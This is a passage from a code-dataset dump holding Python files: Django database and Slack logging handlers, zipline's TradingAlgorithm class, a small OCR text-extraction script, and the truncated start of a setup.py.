hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c330f8a6990fea6359bab8467d42ea370ce5742 | 1,504 | py | Python | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 4 | 2017-06-02T08:48:48.000Z | 2021-11-21T23:57:15.000Z | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 3 | 2020-06-05T16:55:42.000Z | 2021-06-10T17:43:12.000Z | accountifie/common/log.py | imcallister/accountifie | 094834c9d632e0353e3baf8d924eeb10cba0add4 | [
"MIT",
"Unlicense"
] | 4 | 2015-12-15T14:27:51.000Z | 2017-04-21T21:42:27.000Z | """
Partially adapted with permission from ReportLab's DocEngine framework
"""
import requests
import logging
import json
import traceback
from django.views.debug import get_exception_reporter_filter
from django.conf import settings
class DbLogHandler(logging.Handler):
    """Logging handler that persists each record to the database.

    Every emitted record is stored as a ``Log`` row; ERROR-level records
    additionally open an ``Issue`` tracking row pointing at the log entry.
    """

    def emit(self, record):
        # Imported lazily so the handler can be configured before Django's
        # app registry / models are ready.
        from .models import Log, Issue
        try:
            request = record.request
            # Renamed from `filter` to avoid shadowing the builtin.
            reporter_filter = get_exception_reporter_filter(request)
            request_repr = reporter_filter.get_request_repr(request)
        except Exception:
            request = None
            request_repr = "Request repr() unavailable."

        if record.exc_info:
            stack_trace = '\n'.join(traceback.format_exception(*record.exc_info))
        else:
            stack_trace = "No stack trace available"

        rec = Log(level=record.levelname,
                  message=record.getMessage(),
                  request=request_repr,
                  traceback=stack_trace)
        # Correlation id is optional extra context supplied via
        # ``logger.log(..., extra={'corrId': ...})``.
        if hasattr(record, 'corrId'):
            rec.corrId = record.corrId
        rec.save()

        if record.levelname == 'ERROR':
            Issue(log=rec, status='NOTSTARTED').save()
class SlackHandler(logging.Handler):
    """Logging handler that forwards each record to a Slack webhook."""

    def emit(self, record):
        payload = {"text": '%s: %s' % (record.levelname, record.getMessage())}
        body = json.dumps(payload)
        requests.post(settings.SLACK_ENDPOINT_URL, data=body)
| 29.490196 | 81 | 0.62367 |
import requests
import logging
import json
import traceback
from django.views.debug import get_exception_reporter_filter
from django.conf import settings
class DbLogHandler(logging.Handler):
def emit(self, record):
from .models import Log, Issue
try:
request = record.request
filter = get_exception_reporter_filter(request)
request_repr = filter.get_request_repr(request)
except Exception:
request = None
request_repr = "Request repr() unavailable."
if record.exc_info:
exc_info = record.exc_info
stack_trace = '\n'.join(traceback.format_exception(*record.exc_info))
else:
exc_info = (None, record.getMessage(), None)
stack_trace = "No stack trace available"
rec = Log(level=record.levelname,
message=record.getMessage(),
request=request_repr,
traceback=stack_trace
)
if hasattr(record, 'corrId'):
rec.corrId = record.corrId
rec.save()
if record.levelname == 'ERROR':
Issue(log=rec, status='NOTSTARTED').save()
class SlackHandler(logging.Handler):
def emit(self, record):
new_data = {"text": '%s: %s' % (record.levelname, record.getMessage())}
requests.post(settings.SLACK_ENDPOINT_URL, data=json.dumps(new_data))
| true | true |
1c3310046683c750c56af215bc29b813ac883595 | 19,959 | py | Python | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | 2 | 2015-12-10T16:25:10.000Z | 2016-02-17T00:18:38.000Z | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | null | null | null | zipline/algorithm.py | davidastephens/zipline | 1da206df936bb8125913bae9fc182fd4f611a691 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import copy
import pytz
import pandas as pd
import numpy as np
from datetime import datetime
from itertools import groupby, ifilter
from operator import attrgetter
from zipline.errors import (
UnsupportedSlippageModel,
OverrideSlippagePostInit,
UnsupportedCommissionModel,
OverrideCommissionPostInit
)
from zipline.finance.performance import PerformanceTracker
from zipline.sources import DataFrameSource, DataPanelSource
from zipline.utils.factory import create_simulation_parameters
from zipline.transforms.utils import StatefulTransform
from zipline.finance.slippage import (
VolumeShareSlippage,
SlippageModel,
transact_partial
)
from zipline.finance.commission import PerShare, PerTrade, PerDollar
from zipline.finance.blotter import Blotter
from zipline.finance.constants import ANNUALIZER
from zipline.finance import trading
import zipline.protocol
from zipline.protocol import Event
from zipline.gens.composites import (
date_sorted_sources,
sequential_transforms,
alias_dt
)
from zipline.gens.tradesimulation import AlgorithmSimulator
DEFAULT_CAPITAL_BASE = float("1.0e5")
class TradingAlgorithm(object):
"""
Base class for trading algorithms. Inherit and overload
initialize() and handle_data(data).
A new algorithm could look like this:
```
class MyAlgo(TradingAlgorithm):
def initialize(self, sids, amount):
self.sids = sids
self.amount = amount
def handle_data(self, data):
sid = self.sids[0]
amount = self.amount
self.order(sid, amount)
```
To then to run this algorithm:
my_algo = MyAlgo([0], 100) # first argument has to be list of sids
stats = my_algo.run(data)
"""
    def __init__(self, *args, **kwargs):
        """Initialize sids and other state variables.

        :Arguments:
            data_frequency : str (daily, hourly or minutely)
                The duration of the bars.
            annualizer : int <optional>
                Which constant to use for annualizing risk metrics.
                If not provided, will extract from data_frequency.
            capital_base : float <default: 1.0e5>
                How much capital to start with.
            instant_fill : bool <default: False>
                Whether to fill orders immediately or on next bar.
        """
        self.datetime = None
        self.registered_transforms = {}
        self.transforms = []
        self.sources = []
        self._recorded_vars = {}
        self.logger = None

        self.benchmark_return_source = None
        self.perf_tracker = None

        # default components for transact
        self.slippage = VolumeShareSlippage()
        self.commission = PerShare()

        # Resolve data_frequency first: sim_params below depends on it.
        if 'data_frequency' in kwargs:
            self.set_data_frequency(kwargs.pop('data_frequency'))
        else:
            self.data_frequency = None

        self.instant_fill = kwargs.pop('instant_fill', False)

        # Override annualizer if set.  NOTE(review): this reads the key
        # without popping it, so 'annualizer' is also forwarded to
        # self.initialize() below — confirm that is intended.
        if 'annualizer' in kwargs:
            self.annualizer = kwargs['annualizer']

        # set the capital base
        self.capital_base = kwargs.pop('capital_base', DEFAULT_CAPITAL_BASE)

        self.sim_params = kwargs.pop('sim_params', None)
        if self.sim_params:
            # Propagate the resolved frequency (possibly None) and build the
            # tracker now; otherwise _create_generator builds it at run time.
            self.sim_params.data_frequency = self.data_frequency
            self.perf_tracker = PerformanceTracker(self.sim_params)

        self.blotter = kwargs.pop('blotter', None)
        if not self.blotter:
            self.blotter = Blotter()

        self.portfolio_needs_update = True
        self._portfolio = None

        # an algorithm subclass needs to set initialized to True when
        # it is fully initialized.
        self.initialized = False

        # call to user-defined constructor method
        self.initialize(*args, **kwargs)
def __repr__(self):
"""
N.B. this does not yet represent a string that can be used
to instantiate an exact copy of an algorithm.
However, it is getting close, and provides some value as something
that can be inspected interactively.
"""
return """
{class_name}(
capital_base={capital_base}
sim_params={sim_params},
initialized={initialized},
slippage={slippage},
commission={commission},
blotter={blotter},
recorded_vars={recorded_vars})
""".strip().format(class_name=self.__class__.__name__,
capital_base=self.capital_base,
sim_params=repr(self.sim_params),
initialized=self.initialized,
slippage=repr(self.slippage),
commission=repr(self.commission),
blotter=repr(self.blotter),
recorded_vars=repr(self.recorded_vars))
def _create_data_generator(self, source_filter, sim_params):
"""
Create a merged data generator using the sources and
transforms attached to this algorithm.
::source_filter:: is a method that receives events in date
sorted order, and returns True for those events that should be
processed by the zipline, and False for those that should be
skipped.
"""
if self.benchmark_return_source is None:
benchmark_return_source = [
Event({'dt': dt,
'returns': ret,
'type': zipline.protocol.DATASOURCE_TYPE.BENCHMARK,
'source_id': 'benchmarks'})
for dt, ret in trading.environment.benchmark_returns.iterkv()
if dt.date() >= sim_params.period_start.date()
and dt.date() <= sim_params.period_end.date()
]
else:
benchmark_return_source = self.benchmark_return_source
date_sorted = date_sorted_sources(*self.sources)
if source_filter:
date_sorted = ifilter(source_filter, date_sorted)
with_tnfms = sequential_transforms(date_sorted,
*self.transforms)
with_alias_dt = alias_dt(with_tnfms)
with_benchmarks = date_sorted_sources(benchmark_return_source,
with_alias_dt)
# Group together events with the same dt field. This depends on the
# events already being sorted.
return groupby(with_benchmarks, attrgetter('dt'))
def _create_generator(self, sim_params, source_filter=None):
"""
Create a basic generator setup using the sources and
transforms attached to this algorithm.
::source_filter:: is a method that receives events in date
sorted order, and returns True for those events that should be
processed by the zipline, and False for those that should be
skipped.
"""
sim_params.data_frequency = self.data_frequency
# perf_tracker will be instantiated in __init__ if a sim_params
# is passed to the constructor. If not, we instantiate here.
if self.perf_tracker is None:
self.perf_tracker = PerformanceTracker(sim_params)
self.data_gen = self._create_data_generator(source_filter,
sim_params)
self.trading_client = AlgorithmSimulator(self, sim_params)
transact_method = transact_partial(self.slippage, self.commission)
self.set_transact(transact_method)
return self.trading_client.transform(self.data_gen)
def get_generator(self):
"""
Override this method to add new logic to the construction
of the generator. Overrides can use the _create_generator
method to get a standard construction generator.
"""
return self._create_generator(self.sim_params)
    def initialize(self, *args, **kwargs):
        """Subclass hook: set up algorithm state before the simulation runs.

        Called once from ``__init__`` with any leftover constructor
        arguments.  The base implementation is a no-op.
        """
        pass
# TODO: make a new subclass, e.g. BatchAlgorithm, and move
# the run method to the subclass, and refactor to put the
# generator creation logic into get_generator.
def run(self, source, sim_params=None, benchmark_return_source=None):
"""Run the algorithm.
:Arguments:
source : can be either:
- pandas.DataFrame
- zipline source
- list of zipline sources
If pandas.DataFrame is provided, it must have the
following structure:
* column names must consist of ints representing the
different sids
* index must be DatetimeIndex
* array contents should be price info.
:Returns:
daily_stats : pandas.DataFrame
Daily performance metrics such as returns, alpha etc.
"""
if isinstance(source, (list, tuple)):
assert self.sim_params is not None or sim_params is not None, \
"""When providing a list of sources, \
sim_params have to be specified as a parameter
or in the constructor."""
elif isinstance(source, pd.DataFrame):
# if DataFrame provided, wrap in DataFrameSource
source = DataFrameSource(source)
elif isinstance(source, pd.Panel):
source = DataPanelSource(source)
if not isinstance(source, (list, tuple)):
self.sources = [source]
else:
self.sources = source
# Check for override of sim_params.
# If it isn't passed to this function,
# use the default params set with the algorithm.
# Else, we create simulation parameters using the start and end of the
# source provided.
if not sim_params:
if not self.sim_params:
start = source.start
end = source.end
sim_params = create_simulation_parameters(
start=start,
end=end,
capital_base=self.capital_base
)
else:
sim_params = self.sim_params
# Create transforms by wrapping them into StatefulTransforms
self.transforms = []
for namestring, trans_descr in self.registered_transforms.iteritems():
sf = StatefulTransform(
trans_descr['class'],
*trans_descr['args'],
**trans_descr['kwargs']
)
sf.namestring = namestring
self.transforms.append(sf)
# force a reset of the performance tracker, in case
# this is a repeat run of the algorithm.
self.perf_tracker = None
# create transforms and zipline
self.gen = self._create_generator(sim_params)
# loop through simulated_trading, each iteration returns a
# perf dictionary
perfs = []
for perf in self.gen:
perfs.append(perf)
# convert perf dict to pandas dataframe
daily_stats = self._create_daily_stats(perfs)
return daily_stats
    def _create_daily_stats(self, perfs):
        """Convert the simulation's perf packets into a daily stats DataFrame.

        ``perfs`` holds one dict per day (keyed by 'daily_perf') plus a
        final packet without that key, which is the risk report; the risk
        report is stashed on ``self.risk_report`` as a side effect.
        """
        # create daily and cumulative stats dataframe
        daily_perfs = []
        # TODO: the loop here could overwrite expected properties
        # of daily_perf. Could potentially raise or log a
        # warning.
        for perf in perfs:
            if 'daily_perf' in perf:
                # Flatten recorded_vars into the daily dict so each recorded
                # variable becomes its own DataFrame column.
                perf['daily_perf'].update(
                    perf['daily_perf'].pop('recorded_vars')
                )
                daily_perfs.append(perf['daily_perf'])
            else:
                self.risk_report = perf

        # Index rows by each period's close timestamp (UTC).
        daily_dts = [np.datetime64(perf['period_close'], utc=True)
                     for perf in daily_perfs]
        daily_stats = pd.DataFrame(daily_perfs, index=daily_dts)

        return daily_stats
def add_transform(self, transform_class, tag, *args, **kwargs):
"""Add a single-sid, sequential transform to the model.
:Arguments:
transform_class : class
Which transform to use. E.g. mavg.
tag : str
How to name the transform. Can later be access via:
data[sid].tag()
Extra args and kwargs will be forwarded to the transform
instantiation.
"""
self.registered_transforms[tag] = {'class': transform_class,
'args': args,
'kwargs': kwargs}
def record(self, **kwargs):
"""
Track and record local variable (i.e. attributes) each day.
"""
for name, value in kwargs.items():
self._recorded_vars[name] = value
def order(self, sid, amount, limit_price=None, stop_price=None):
return self.blotter.order(sid, amount, limit_price, stop_price)
def order_value(self, sid, value, limit_price=None, stop_price=None):
"""
Place an order by desired value rather than desired number of shares.
If the requested sid is found in the universe, the requested value is
divided by its price to imply the number of shares to transact.
value > 0 :: Buy/Cover
value < 0 :: Sell/Short
Market order: order(sid, value)
Limit order: order(sid, value, limit_price)
Stop order: order(sid, value, None, stop_price)
StopLimit order: order(sid, value, limit_price, stop_price)
"""
last_price = self.trading_client.current_data[sid].price
if np.allclose(last_price, 0):
zero_message = "Price of 0 for {psid}; can't infer value".format(
psid=sid
)
self.logger.debug(zero_message)
# Don't place any order
return
else:
amount = value / last_price
return self.order(sid, amount, limit_price, stop_price)
@property
def recorded_vars(self):
return copy(self._recorded_vars)
@property
def portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
return self.perf_tracker.get_portfolio()
def updated_portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
if self.portfolio_needs_update:
self._portfolio = self.perf_tracker.get_portfolio()
self.portfolio_needs_update = False
return self._portfolio
def set_logger(self, logger):
self.logger = logger
def set_datetime(self, dt):
assert isinstance(dt, datetime), \
"Attempt to set algorithm's current time with non-datetime"
assert dt.tzinfo == pytz.utc, \
"Algorithm expects a utc datetime"
self.datetime = dt
def get_datetime(self):
"""
Returns a copy of the datetime.
"""
date_copy = copy(self.datetime)
assert date_copy.tzinfo == pytz.utc, \
"Algorithm should have a utc datetime"
return date_copy
def set_transact(self, transact):
"""
Set the method that will be called to create a
transaction from open orders and trade events.
"""
self.blotter.transact = transact
def set_slippage(self, slippage):
if not isinstance(slippage, SlippageModel):
raise UnsupportedSlippageModel()
if self.initialized:
raise OverrideSlippagePostInit()
self.slippage = slippage
def set_commission(self, commission):
if not isinstance(commission, (PerShare, PerTrade, PerDollar)):
raise UnsupportedCommissionModel()
if self.initialized:
raise OverrideCommissionPostInit()
self.commission = commission
def set_sources(self, sources):
assert isinstance(sources, list)
self.sources = sources
def set_transforms(self, transforms):
assert isinstance(transforms, list)
self.transforms = transforms
def set_data_frequency(self, data_frequency):
assert data_frequency in ('daily', 'minute')
self.data_frequency = data_frequency
self.annualizer = ANNUALIZER[self.data_frequency]
def order_percent(self, sid, percent, limit_price=None, stop_price=None):
"""
Place an order in the specified security corresponding to the given
percent of the current portfolio value.
Note that percent must expressed as a decimal (0.50 means 50\%).
"""
value = self.portfolio.portfolio_value * percent
return self.order_value(sid, value, limit_price, stop_price)
def order_target(self, sid, target, limit_price=None, stop_price=None):
"""
Place an order to adjust a position to a target number of shares. If
the position doesn't already exist, this is equivalent to placing a new
order. If the position does exist, this is equivalent to placing an
order for the difference between the target number of shares and the
current number of shares.
"""
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
req_shares = target - current_position
return self.order(sid, req_shares, limit_price, stop_price)
else:
return self.order(sid, target, limit_price, stop_price)
def order_target_value(self, sid, target, limit_price=None,
stop_price=None):
"""
Place an order to adjust a position to a target value. If
the position doesn't already exist, this is equivalent to placing a new
order. If the position does exist, this is equivalent to placing an
order for the difference between the target value and the
current value.
"""
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
req_value = target - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
else:
return self.order_value(sid, target, limit_price, stop_price)
    def order_target_percent(self, sid, target, limit_price=None,
                             stop_price=None):
        """
        Place an order to adjust a position to a target percent of the
        current portfolio value. If the position doesn't already exist, this is
        equivalent to placing a new order. If the position does exist, this is
        equivalent to placing an order for the difference between the target
        percent and the current percent.

        Note that target must expressed as a decimal (0.50 means 50\%).
        """
        if sid in self.portfolio.positions:
            # Current market value of the existing position.
            current_position = self.portfolio.positions[sid].amount
            current_price = self.portfolio.positions[sid].last_sale_price
            current_value = current_position * current_price
        else:
            current_value = 0
        target_value = self.portfolio.portfolio_value * target
        # Order the dollar difference; order_value converts it to shares.
        req_value = target_value - current_value
        return self.order_value(sid, req_value, limit_price, stop_price)
| 36.488117 | 79 | 0.628288 |
from copy import copy
import pytz
import pandas as pd
import numpy as np
from datetime import datetime
from itertools import groupby, ifilter
from operator import attrgetter
from zipline.errors import (
UnsupportedSlippageModel,
OverrideSlippagePostInit,
UnsupportedCommissionModel,
OverrideCommissionPostInit
)
from zipline.finance.performance import PerformanceTracker
from zipline.sources import DataFrameSource, DataPanelSource
from zipline.utils.factory import create_simulation_parameters
from zipline.transforms.utils import StatefulTransform
from zipline.finance.slippage import (
VolumeShareSlippage,
SlippageModel,
transact_partial
)
from zipline.finance.commission import PerShare, PerTrade, PerDollar
from zipline.finance.blotter import Blotter
from zipline.finance.constants import ANNUALIZER
from zipline.finance import trading
import zipline.protocol
from zipline.protocol import Event
from zipline.gens.composites import (
date_sorted_sources,
sequential_transforms,
alias_dt
)
from zipline.gens.tradesimulation import AlgorithmSimulator
DEFAULT_CAPITAL_BASE = float("1.0e5")
class TradingAlgorithm(object):
def __init__(self, *args, **kwargs):
self.datetime = None
self.registered_transforms = {}
self.transforms = []
self.sources = []
self._recorded_vars = {}
self.logger = None
self.benchmark_return_source = None
self.perf_tracker = None
self.slippage = VolumeShareSlippage()
self.commission = PerShare()
if 'data_frequency' in kwargs:
self.set_data_frequency(kwargs.pop('data_frequency'))
else:
self.data_frequency = None
self.instant_fill = kwargs.pop('instant_fill', False)
if 'annualizer' in kwargs:
self.annualizer = kwargs['annualizer']
self.capital_base = kwargs.pop('capital_base', DEFAULT_CAPITAL_BASE)
self.sim_params = kwargs.pop('sim_params', None)
if self.sim_params:
self.sim_params.data_frequency = self.data_frequency
self.perf_tracker = PerformanceTracker(self.sim_params)
self.blotter = kwargs.pop('blotter', None)
if not self.blotter:
self.blotter = Blotter()
self.portfolio_needs_update = True
self._portfolio = None
self.initialized = False
self.initialize(*args, **kwargs)
def __repr__(self):
return """
{class_name}(
capital_base={capital_base}
sim_params={sim_params},
initialized={initialized},
slippage={slippage},
commission={commission},
blotter={blotter},
recorded_vars={recorded_vars})
""".strip().format(class_name=self.__class__.__name__,
capital_base=self.capital_base,
sim_params=repr(self.sim_params),
initialized=self.initialized,
slippage=repr(self.slippage),
commission=repr(self.commission),
blotter=repr(self.blotter),
recorded_vars=repr(self.recorded_vars))
def _create_data_generator(self, source_filter, sim_params):
if self.benchmark_return_source is None:
benchmark_return_source = [
Event({'dt': dt,
'returns': ret,
'type': zipline.protocol.DATASOURCE_TYPE.BENCHMARK,
'source_id': 'benchmarks'})
for dt, ret in trading.environment.benchmark_returns.iterkv()
if dt.date() >= sim_params.period_start.date()
and dt.date() <= sim_params.period_end.date()
]
else:
benchmark_return_source = self.benchmark_return_source
date_sorted = date_sorted_sources(*self.sources)
if source_filter:
date_sorted = ifilter(source_filter, date_sorted)
with_tnfms = sequential_transforms(date_sorted,
*self.transforms)
with_alias_dt = alias_dt(with_tnfms)
with_benchmarks = date_sorted_sources(benchmark_return_source,
with_alias_dt)
return groupby(with_benchmarks, attrgetter('dt'))
def _create_generator(self, sim_params, source_filter=None):
sim_params.data_frequency = self.data_frequency
if self.perf_tracker is None:
self.perf_tracker = PerformanceTracker(sim_params)
self.data_gen = self._create_data_generator(source_filter,
sim_params)
self.trading_client = AlgorithmSimulator(self, sim_params)
transact_method = transact_partial(self.slippage, self.commission)
self.set_transact(transact_method)
return self.trading_client.transform(self.data_gen)
def get_generator(self):
return self._create_generator(self.sim_params)
def initialize(self, *args, **kwargs):
pass
def run(self, source, sim_params=None, benchmark_return_source=None):
if isinstance(source, (list, tuple)):
assert self.sim_params is not None or sim_params is not None, \
"""When providing a list of sources, \
sim_params have to be specified as a parameter
or in the constructor."""
elif isinstance(source, pd.DataFrame):
source = DataFrameSource(source)
elif isinstance(source, pd.Panel):
source = DataPanelSource(source)
if not isinstance(source, (list, tuple)):
self.sources = [source]
else:
self.sources = source
# use the default params set with the algorithm.
# Else, we create simulation parameters using the start and end of the
# source provided.
if not sim_params:
if not self.sim_params:
start = source.start
end = source.end
sim_params = create_simulation_parameters(
start=start,
end=end,
capital_base=self.capital_base
)
else:
sim_params = self.sim_params
# Create transforms by wrapping them into StatefulTransforms
self.transforms = []
for namestring, trans_descr in self.registered_transforms.iteritems():
sf = StatefulTransform(
trans_descr['class'],
*trans_descr['args'],
**trans_descr['kwargs']
)
sf.namestring = namestring
self.transforms.append(sf)
# force a reset of the performance tracker, in case
# this is a repeat run of the algorithm.
self.perf_tracker = None
# create transforms and zipline
self.gen = self._create_generator(sim_params)
# loop through simulated_trading, each iteration returns a
# perf dictionary
perfs = []
for perf in self.gen:
perfs.append(perf)
# convert perf dict to pandas dataframe
daily_stats = self._create_daily_stats(perfs)
return daily_stats
def _create_daily_stats(self, perfs):
# create daily and cumulative stats dataframe
daily_perfs = []
# TODO: the loop here could overwrite expected properties
# of daily_perf. Could potentially raise or log a
# warning.
for perf in perfs:
if 'daily_perf' in perf:
perf['daily_perf'].update(
perf['daily_perf'].pop('recorded_vars')
)
daily_perfs.append(perf['daily_perf'])
else:
self.risk_report = perf
daily_dts = [np.datetime64(perf['period_close'], utc=True)
for perf in daily_perfs]
daily_stats = pd.DataFrame(daily_perfs, index=daily_dts)
return daily_stats
def add_transform(self, transform_class, tag, *args, **kwargs):
self.registered_transforms[tag] = {'class': transform_class,
'args': args,
'kwargs': kwargs}
def record(self, **kwargs):
for name, value in kwargs.items():
self._recorded_vars[name] = value
def order(self, sid, amount, limit_price=None, stop_price=None):
return self.blotter.order(sid, amount, limit_price, stop_price)
def order_value(self, sid, value, limit_price=None, stop_price=None):
last_price = self.trading_client.current_data[sid].price
if np.allclose(last_price, 0):
zero_message = "Price of 0 for {psid}; can't infer value".format(
psid=sid
)
self.logger.debug(zero_message)
return
else:
amount = value / last_price
return self.order(sid, amount, limit_price, stop_price)
@property
def recorded_vars(self):
return copy(self._recorded_vars)
@property
def portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
return self.perf_tracker.get_portfolio()
def updated_portfolio(self):
# internally this will cause a refresh of the
# period performance calculations.
if self.portfolio_needs_update:
self._portfolio = self.perf_tracker.get_portfolio()
self.portfolio_needs_update = False
return self._portfolio
def set_logger(self, logger):
self.logger = logger
def set_datetime(self, dt):
assert isinstance(dt, datetime), \
"Attempt to set algorithm's current time with non-datetime"
assert dt.tzinfo == pytz.utc, \
"Algorithm expects a utc datetime"
self.datetime = dt
def get_datetime(self):
date_copy = copy(self.datetime)
assert date_copy.tzinfo == pytz.utc, \
"Algorithm should have a utc datetime"
return date_copy
def set_transact(self, transact):
self.blotter.transact = transact
def set_slippage(self, slippage):
if not isinstance(slippage, SlippageModel):
raise UnsupportedSlippageModel()
if self.initialized:
raise OverrideSlippagePostInit()
self.slippage = slippage
def set_commission(self, commission):
if not isinstance(commission, (PerShare, PerTrade, PerDollar)):
raise UnsupportedCommissionModel()
if self.initialized:
raise OverrideCommissionPostInit()
self.commission = commission
def set_sources(self, sources):
assert isinstance(sources, list)
self.sources = sources
def set_transforms(self, transforms):
assert isinstance(transforms, list)
self.transforms = transforms
def set_data_frequency(self, data_frequency):
assert data_frequency in ('daily', 'minute')
self.data_frequency = data_frequency
self.annualizer = ANNUALIZER[self.data_frequency]
def order_percent(self, sid, percent, limit_price=None, stop_price=None):
value = self.portfolio.portfolio_value * percent
return self.order_value(sid, value, limit_price, stop_price)
def order_target(self, sid, target, limit_price=None, stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
req_shares = target - current_position
return self.order(sid, req_shares, limit_price, stop_price)
else:
return self.order(sid, target, limit_price, stop_price)
def order_target_value(self, sid, target, limit_price=None,
stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
req_value = target - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
else:
return self.order_value(sid, target, limit_price, stop_price)
def order_target_percent(self, sid, target, limit_price=None,
stop_price=None):
if sid in self.portfolio.positions:
current_position = self.portfolio.positions[sid].amount
current_price = self.portfolio.positions[sid].last_sale_price
current_value = current_position * current_price
else:
current_value = 0
target_value = self.portfolio.portfolio_value * target
req_value = target_value - current_value
return self.order_value(sid, req_value, limit_price, stop_price)
| true | true |
1c3310438ac0db658cd7671f27d9557f80502ddf | 691 | py | Python | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | 1 | 2019-06-05T22:25:14.000Z | 2019-06-05T22:25:14.000Z | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | null | null | null | extract_text_from_pics.py | Jrfix/Extract_Text_From_Pics | d72fca954fd2e1663b3a40c8005f45b6876daf72 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PIL import Image
from pytesseract import image_to_string
import sys
import os
import time
from time import sleep
print("Example --> /root/Desktop/")
image_path = raw_input("Image path: ")
print("Example --> picture.png")
image_name = raw_input("Image name: ")
os.system("clear")
img = Image.open(image_path+image_name)
try:
text = image_to_string(img)
#text = image_to_string(img,lang="eng")
except:
print("[-]Uncompleted")
for i in range(50):
sys.stdout.write('\r')
sleep(0.12)
os.system("clear||cls")
print("[+]Completed")
file = open(image_path+image_name + ".txt","w")
file.write(text)
file.close()
| 13.288462 | 48 | 0.671491 |
from PIL import Image
from pytesseract import image_to_string
import sys
import os
import time
from time import sleep
print("Example --> /root/Desktop/")
image_path = raw_input("Image path: ")
print("Example --> picture.png")
image_name = raw_input("Image name: ")
os.system("clear")
img = Image.open(image_path+image_name)
try:
text = image_to_string(img)
except:
print("[-]Uncompleted")
for i in range(50):
sys.stdout.write('\r')
sleep(0.12)
os.system("clear||cls")
print("[+]Completed")
file = open(image_path+image_name + ".txt","w")
file.write(text)
file.close()
| true | true |
1c331071f4bf4f4c900885a34d173bfff95f2e89 | 2,832 | py | Python | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | setup.py | aryabhatt/autocorr-1 | dd47b01498be68d2cd1557b620bc68f4b76c3e11 | [
"BSD-3-Clause"
] | null | null | null | from os import path
from setuptools import setup, find_packages, Extension
import sys
import versioneer
# Minimum (major, minor) of pybind11 required to build the C++ extension.
min_pybind11_version = (2, 3)

# NOTE: This file must remain Python 2 compatible for the foreseeable future,
# to ensure that we error out properly for people with outdated setuptools
# and/or pip.
min_version = (3, 6)
if sys.version_info < min_version:
    error = """
autocorr does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
    sys.exit(error)

here = path.abspath(path.dirname(__file__))

# Long description for PyPI comes straight from the README.
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    readme = f.read()

# Parse requirements.txt, ignoring any commented-out lines.
with open(path.join(here, 'requirements.txt')) as f:
    requirements = [ln for ln in f.read().splitlines()
                    if not ln.startswith('#')]

# C/C++ extension modules, appended to below and handed to setup().
extensions = []
def get_pybind11_headers():
    """Return pybind11's include directory, enforcing the minimum version.

    pybind11 is imported lazily so the rest of setup.py can still run (and
    report a clean error) when it is missing.

    Raises:
        Exception: if the installed pybind11 is older than
            ``min_pybind11_version``.
    """
    import pybind11

